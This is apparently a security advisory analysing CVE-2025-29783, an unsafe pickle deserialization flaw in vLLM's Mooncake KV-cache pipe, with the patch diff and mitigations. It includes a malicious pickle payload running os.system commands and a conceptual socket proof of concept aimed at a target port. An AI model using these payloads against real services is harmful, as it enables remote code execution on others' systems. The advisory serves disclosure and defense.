
CVE-2025-29783: Remote Code Execution in vLLM via Unsafe Deserialization in Mooncake

Robert Morgan

Mar 19, 2025

Executive Summary

CVE-2025-29783 is a critical remote code execution (RCE) vulnerability affecting vLLM, a high-throughput and memory-efficient inference and serving engine for Large Language Models (LLMs). The vulnerability stems from unsafe deserialization with pickle in the Mooncake integration, which vLLM uses for distributed key-value (KV) cache management. When vLLM is configured to use Mooncake, its ZMQ/TCP endpoints listen on all network interfaces, so unauthenticated attackers who can reach them can execute arbitrary code on distributed hosts by sending malicious serialized data. The fix replaces pickle with safetensors for serialization, removing the code-execution path. The vulnerability has a CVSS v3.1 base score of 10.0, the maximum possible severity.

Technical Details

The vulnerability resides in the vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py module of the vLLM project. This module transfers KV caches between distributed nodes using ZeroMQ (ZMQ) over TCP. Versions prior to 0.8.0 are affected. The core issue is the use of Python's pickle module to serialize and deserialize tensor data during the transfer.

The vulnerable code is located within the _send_impl and _recv_impl methods of the MooncakeKVPipe class. These methods are responsible for sending and receiving tensor data, respectively.

    def _send_impl(self, tensor: torch.Tensor) -> None:
        """Implement the tensor sending logic."""
        value_bytes = pickle.dumps(tensor)
        self.transfer_engine.send_bytes(value_bytes)

    def _recv_impl(self) -> torch.Tensor:
        """Implement the tensor receiving logic."""
        data = self.transfer_engine.recv_bytes()
        return pickle.loads(data)

The pickle.dumps() function serializes the tensor into a byte stream, which is then sent over the network. On the receiving end, pickle.loads() deserializes the byte stream back into a tensor. The problem is that a pickle stream is not plain data: it is a sequence of instructions for the unpickler, which can import arbitrary callables and call them with arguments taken from the stream. Deserializing untrusted pickle data can therefore execute arbitrary code.

Affected systems are those running vLLM with Mooncake enabled for distributed KV cache management, which typically means a cluster of machines communicating over ZMQ/TCP. Because the Mooncake endpoints listen on all network interfaces, any host that can reach those ports, including hosts outside the cluster's network if the ports are exposed, can potentially exploit the flaw.

Root Cause Analysis

The root cause of CVE-2025-29783 is the use of Python's pickle module to serialize and deserialize data in a network-exposed service. pickle is unsafe for untrusted input because a pickle stream can instruct the unpickler to import any importable callable and invoke it, including functions that execute system commands or perform other malicious actions.

The MooncakeKVPipe class in vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py uses pickle to serialize PyTorch tensors before sending them over the network and to deserialize them upon receipt. This means that an attacker who can send data to the ZMQ/TCP port used by Mooncake can inject malicious pickle payloads that will be executed by the receiving vLLM instance.

Here's a breakdown of how the vulnerability can be exploited:

Attacker crafts a malicious pickle payload: The attacker creates a pickle stream that, when deserialized, executes arbitrary Python code. The usual technique is to define a class whose __reduce__ method names a function, along with its arguments, for the unpickler to call during deserialization.
Attacker sends the malicious payload to the vLLM instance: The attacker sends the crafted pickle stream to the ZMQ/TCP port used by the Mooncake component of vLLM.
vLLM instance deserializes the payload: The receiving vLLM instance calls pickle.loads() on the received data, which deserializes the malicious payload and executes the embedded code.
Arbitrary code execution: The attacker's code is executed on the vLLM instance, allowing them to perform actions such as reading sensitive data, modifying files, or even taking complete control of the system.
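The four steps can be reproduced inside a single Python process, with no network involved. This is an illustrative sketch only: InMemoryTransferEngine and VulnerableReceiver are hypothetical stand-ins (not vLLM classes) that mirror the send_bytes/recv_bytes calls and the pre-0.8.0 _recv_impl shown earlier, and the payload calls the harmless eval("6 * 7") instead of a system command.

```python
import pickle
from collections import deque


class InMemoryTransferEngine:
    """Hypothetical stand-in for the transfer engine: a FIFO of byte messages."""

    def __init__(self) -> None:
        self._queue = deque()

    def send_bytes(self, data: bytes) -> None:
        self._queue.append(data)

    def recv_bytes(self) -> bytes:
        return self._queue.popleft()


class VulnerableReceiver:
    """Hypothetical receiver mirroring the pre-0.8.0 _recv_impl."""

    def __init__(self, transfer_engine: InMemoryTransferEngine) -> None:
        self.transfer_engine = transfer_engine

    def _recv_impl(self):
        data = self.transfer_engine.recv_bytes()
        return pickle.loads(data)  # Step 3: untrusted bytes are unpickled


class Payload:
    """Step 1: benign stand-in for a malicious payload."""

    def __reduce__(self):
        # The unpickler will call eval("6 * 7"); a real payload would name
        # os.system (or similar) here instead.
        return (eval, ("6 * 7",))


engine = InMemoryTransferEngine()
engine.send_bytes(pickle.dumps(Payload()))        # Step 2: payload reaches the pipe
result = VulnerableReceiver(engine)._recv_impl()  # Steps 3-4: the call runs on receipt
print(type(result).__name__, result)              # int 42, not a tensor
```

The receiver expected a tensor and instead got whatever the attacker-chosen callable returned; replacing eval with os.system is all it takes to turn this into command execution.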

The following is an example of a malicious pickle payload that executes the uname -a command:

import os
import pickle

class RCE:
    def __reduce__(self):
        # os.system takes a single command string, so the args tuple
        # holds exactly one element
        cmd = ('uname -a',)
        return (os.system, cmd)

serialized_data = pickle.dumps(RCE())

# This serialized_data can be sent to the vulnerable vLLM instance.
# When the vLLM instance deserializes it with pickle.loads(),
# the unpickler calls os.system('uname -a').

This payload defines a class RCE with a __reduce__ method. pickle calls __reduce__ at serialization time; the method returns a callable and a tuple of arguments, which pickle records in the stream. At deserialization time, the unpickler calls that callable with those arguments to "reconstruct" the object. Here, it instructs pickle to run uname -a through os.system as soon as the data is loaded, on whichever machine calls pickle.loads().
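Because the callable and its arguments are stored by name in the stream, a captured payload can be inspected without executing it. The sketch below redefines RCE with a single command string and walks the stream with pickletools.genops, which decodes opcodes and never calls anything. The helper name summarize is hypothetical, and protocol=4 is pinned only so the opcode sequence is predictable.

```python
import os
import pickle
import pickletools


class RCE:
    def __reduce__(self):
        return (os.system, ("uname -a",))


payload = pickle.dumps(RCE(), protocol=4)


def summarize(data: bytes) -> tuple[list[str], list[str]]:
    """Collect opcode names and string arguments; nothing is executed."""
    opcodes, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        opcodes.append(opcode.name)
        if isinstance(arg, str):
            strings.append(arg)
    return opcodes, strings


opcodes, strings = summarize(payload)
print(strings)              # module and name of the callable, then its argument
print("REDUCE" in opcodes)  # the stream would call that callable on load
```

On Linux the collected strings are the callable's module and name (os.system pickles as posix.system) followed by "uname -a", and the opcode list contains the REDUCE instruction that performs the call during pickle.loads().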

Patch Analysis

The fix for CVE-2025-29783 replaces pickle with safetensors for serializing and deserializing tensor data in the MooncakeKVPipe class. safetensors is a safer alternative because its format is pure data: an 8-byte header length, a JSON header listing each tensor's dtype, shape, and byte offsets, and then the raw tensor bytes. Loading it only parses that header and copies bytes; nothing in the stream can cause Python code to be imported or called.

The following diff shows the changes made to vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py:

--- a/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
+++ b/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
@@ -2,13 +2,14 @@
 
 import json
 import os
-import pickle
 from concurrent.futures import ThreadPoolExecutor
 from dataclasses import dataclass
 from typing import Optional, Union
 
 import torch
 import zmq
+from safetensors.torch import load as safetensors_load
+from safetensors.torch import save as safetensors_save
 
 from vllm.config import KVTransferConfig
 from vllm.distributed.kv_transfer.kv_pipe.base import KVPipeBase
@@ -237,14 +238,13 @@ def tensor_hash(self, tensor: torch.Tensor) -> int:
         return hash(tensor.data_ptr())
 
     def _send_impl(self, tensor: torch.Tensor) -> None:
-        """Implement the tensor sending logic."""
-        value_bytes = pickle.dumps(tensor)
-        self.transfer_engine.send_bytes(value_bytes)
+        """Implement the tensor sending logic using safetensors."""
+        self.transfer_engine.send_bytes(safetensors_save({"tensor": tensor}))
 
     def _recv_impl(self) -> torch.Tensor:
-        """Implement the tensor receiving logic."""
+        """Implement the tensor receiving logic using safetensors."""
         data = self.transfer_engine.recv_bytes()
-        return pickle.loads(data)
+        return safetensors_load(data)["tensor"].to(self.device)
 
     def send_tensor(self, tensor: Optional[torch.Tensor]) -> None:
         """Send tensor to the target process."""

The patch removes the import pickle statement and adds from safetensors.torch import load as safetensors_load and from safetensors.torch import save as safetensors_save. The _send_impl method now uses safetensors_save to serialize the tensor into a byte stream, and the _recv_impl method uses safetensors_load to deserialize the byte stream back into a tensor. The .to(self.device) call then moves the tensor to the pipe's device, since safetensors_load returns CPU tensors.

Specifically, the following lines were changed:

value_bytes = pickle.dumps(tensor) and the following self.transfer_engine.send_bytes(value_bytes) are collapsed into self.transfer_engine.send_bytes(safetensors_save({"tensor": tensor}))
return pickle.loads(data) is replaced with return safetensors_load(data)["tensor"].to(self.device)

The safetensors_save function takes a dictionary mapping tensor names to tensors and returns the serialized bytes; here, the single tensor is stored under the name "tensor". The safetensors_load function returns a dictionary of the deserialized tensors, and ["tensor"] retrieves that entry.
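To see why loading such a blob cannot run code, here is a toy, standard-library-only encoder and decoder that follows the layout documented for safetensors: an 8-byte little-endian header length, a JSON header giving each tensor's dtype, shape, and data_offsets, then the raw bytes. It is an illustration under simplifying assumptions (1-D float32 lists only), not the safetensors library; toy_save and toy_load are hypothetical names, and the real loader performs more validation.

```python
import json
import struct


def toy_save(tensors: dict[str, list[float]]) -> bytes:
    """Serialize 1-D float32 lists using a safetensors-style layout."""
    header = {}
    body = bytearray()
    for name, values in tensors.items():
        start = len(body)
        body += struct.pack(f"<{len(values)}f", *values)  # little-endian float32
        header[name] = {
            "dtype": "F32",
            "shape": [len(values)],
            "data_offsets": [start, len(body)],  # relative to the byte buffer
        }
    header_bytes = json.dumps(header).encode("utf-8")
    return struct.pack("<Q", len(header_bytes)) + header_bytes + bytes(body)


def toy_load(data: bytes) -> dict[str, list[float]]:
    """Parse the layout back: only JSON and raw numbers are read, no code runs."""
    (header_len,) = struct.unpack_from("<Q", data, 0)
    header = json.loads(data[8:8 + header_len].decode("utf-8"))
    body = data[8 + header_len:]
    tensors = {}
    for name, info in header.items():
        if name == "__metadata__":  # optional free-form metadata entry
            continue
        if info["dtype"] != "F32" or len(info["shape"]) != 1:
            raise ValueError(f"{name}: toy loader only supports 1-D F32")
        begin, end = info["data_offsets"]
        count = info["shape"][0]
        # Reject offsets that fall outside the buffer or disagree with the shape.
        if not 0 <= begin <= end <= len(body) or end - begin != 4 * count:
            raise ValueError(f"{name}: offsets do not match shape")
        tensors[name] = list(struct.unpack_from(f"<{count}f", body, begin))
    return tensors


blob = toy_save({"tensor": [1.0, 2.5, -3.0]})
print(toy_load(blob)["tensor"])  # [1.0, 2.5, -3.0]
```

The worst a hostile blob can do to this kind of loader is fail validation or yield unexpected numbers; there is no opcode that names a function to call.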

This change closes the code-execution path: a safetensors payload can only describe tensors, so a malicious sender can at most supply malformed or unexpected tensor data, not code that runs on the receiver.
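The vLLM patch removes pickle from this path entirely, which is the robust choice. For other code that cannot drop pickle right away, the Python pickle documentation describes a weaker, defense-in-depth pattern called "Restricting Globals": override Unpickler.find_class so the stream may only reference an allow-list of callables. This is a swapped-in technique, not part of the vLLM fix, and the pickle docs still advise considering alternatives to pickle when security is a concern. The allow-list below mirrors the docs' example; RestrictedUnpickler and restricted_loads are illustrative names.

```python
import builtins
import io
import os
import pickle

# Allow-list of globals a stream may reference (mirrors the Python docs
# example; a real service would list only what it actually needs).
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        # The unpickler calls find_class whenever the stream requests a global.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class RCE:
    def __reduce__(self):
        return (os.system, ("uname -a",))


print(restricted_loads(pickle.dumps([1.0, 2.0, 3.0])))  # plain data still loads
try:
    restricted_loads(pickle.dumps(RCE()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)  # os.system is not on the allow-list
```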

Exploitation Techniques

Because the vulnerability is an unsafe deserialization issue, an attacker can craft a malicious pickle payload that executes arbitrary code when the vulnerable vLLM instance deserializes it.

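Here's a conceptual proof-of-concept (PoC) demonstrating how an attacker could exploit this vulnerability. It is a simplified illustration of the general principle behind pickle exploits, not a working exploit: Mooncake's endpoints use ZeroMQ, which speaks its own ZMTP wire protocol, so raw bytes written to a plain TCP socket as below would not be delivered to the application as a message. A real exploit would need a ZMQ client, would have to match the pipe's message framing, and would have to be adapted to the specific environment and dependencies of the vLLM instance.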

import socket
import pickle
import os

# Target information
TARGET_HOST = "vulnerable_vllm_host"
TARGET_PORT = 12345  # Replace with the actual Mooncake port

# Malicious payload
class RCE:
    def __reduce__(self):
        # Command to execute on the target system; os.system takes a single
        # command string, so the args tuple has exactly one element
        cmd = ('touch /tmp/pwned',)  # Creates a file /tmp/pwned
        return (os.system, cmd)

payload = pickle.dumps(RCE())

# Create a socket and connect to the target
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((TARGET_HOST, TARGET_PORT))
    print(f"Connected to {TARGET_HOST}:{TARGET_PORT}")

    # Send the malicious payload
    sock.sendall(payload)
    print("Malicious payload sent.")

except socket.error as e:
    print(f"Socket error: {e}")
finally:
    sock.close()
    print("Connection closed.")

Explanation:

Target Information: The TARGET_HOST and TARGET_PORT variables need to be set to the IP address and port number of the vulnerable vLLM instance's Mooncake component.
Malicious Payload: The RCE class defines a __reduce__ method that, when deserialized, will execute the touch /tmp/pwned command on the target system. This command creates a file named /tmp/pwned in the /tmp directory, which is a simple way to verify that the code execution was successful.
Socket Connection: The code creates a socket and connects to the target host and port.
Payload Transmission: The code sends the malicious pickle payload to the target system.
Error Handling: The code includes basic error handling to catch socket errors.

Attack Scenario:

The attacker identifies a vLLM instance running with Mooncake enabled.
The attacker determines the ZMQ/TCP port used by Mooncake (e.g., by examining the vLLM configuration).
The attacker crafts a malicious pickle payload as shown above.
The attacker executes the PoC script, sending the malicious payload to the vLLM instance.
If the exploit is successful, the touch /tmp/pwned command will be executed on the vLLM instance, creating the /tmp/pwned file.

Real-World Impacts:

The impact of this vulnerability is severe. An attacker who successfully exploits this vulnerability can gain complete control of the vLLM instance and potentially the entire cluster of machines running vLLM. This could lead to:

Data Breach: The attacker could steal sensitive data processed by the LLMs.
System Compromise: The attacker could install malware, create backdoors, or use the compromised systems to launch attacks against other targets.
Denial of Service: The attacker could crash the vLLM instance or disrupt its operation.
Reputation Damage: A successful attack could damage the reputation of the organization using vLLM.

Mitigation Strategies

To mitigate the risk of CVE-2025-29783, the following steps should be taken:

Upgrade to vLLM 0.8.0 or later: This version contains the fix for the vulnerability, which replaces pickle with safetensors for serialization.
Disable Mooncake if not needed: If distributed KV cache management is not required, disable Mooncake to eliminate the vulnerability.
Network Segmentation: Isolate the vLLM cluster from the rest of the network to limit the potential impact of a successful attack. Use firewalls to restrict access to the ZMQ/TCP port used by Mooncake.
Authentication and Authorization: The Mooncake endpoints accept data without authentication, so any access control has to be added around them, for example at the network layer or through an authenticated tunnel. This narrows who can reach the port but does not remove the underlying flaw, so upgrading to the patched version is still essential.
Monitoring and Intrusion Detection: Implement monitoring and intrusion detection systems to detect suspicious activity on the vLLM cluster. This can help identify and respond to attacks in a timely manner.
Security Best Practices: Follow general security best practices, such as keeping software up to date, using strong passwords, and educating users about phishing and other social engineering attacks.
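To confirm that the firewall rule described under Network Segmentation actually blocks access, an operator can attempt a plain TCP connection to the Mooncake port from a host that should not be able to reach it. The sketch below uses only the standard library; port_is_reachable is a hypothetical helper, and a successful TCP connection only shows the port is reachable, not that the instance is vulnerable.

```python
import socket


def port_is_reachable(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        # create_connection resolves host and tries each returned address.
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Refused, timed out, unreachable, or unresolvable: treat as blocked.
        return False
```

For example, running port_is_reachable("vllm-node.internal", 12345) from outside the cluster (both values are placeholders for your own node and Mooncake port) should return False once the rule is in place.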

Timeline of Discovery and Disclosure

2025-03-04: Initial commit addressing the vulnerability.
2025-03-19: CVE-2025-29783 assigned and publicly disclosed.
2025-03-19: vLLM version 0.8.0 released with the fix.

References

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29783
GitHub Advisory: https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7
Commit fixing the vulnerability: https://github.com/vllm-project/vllm/commit/288ca110f68d23909728627d3100e5a8db820aa2
Pull Request fixing the vulnerability: https://github.com/vllm-project/vllm/pull/14228
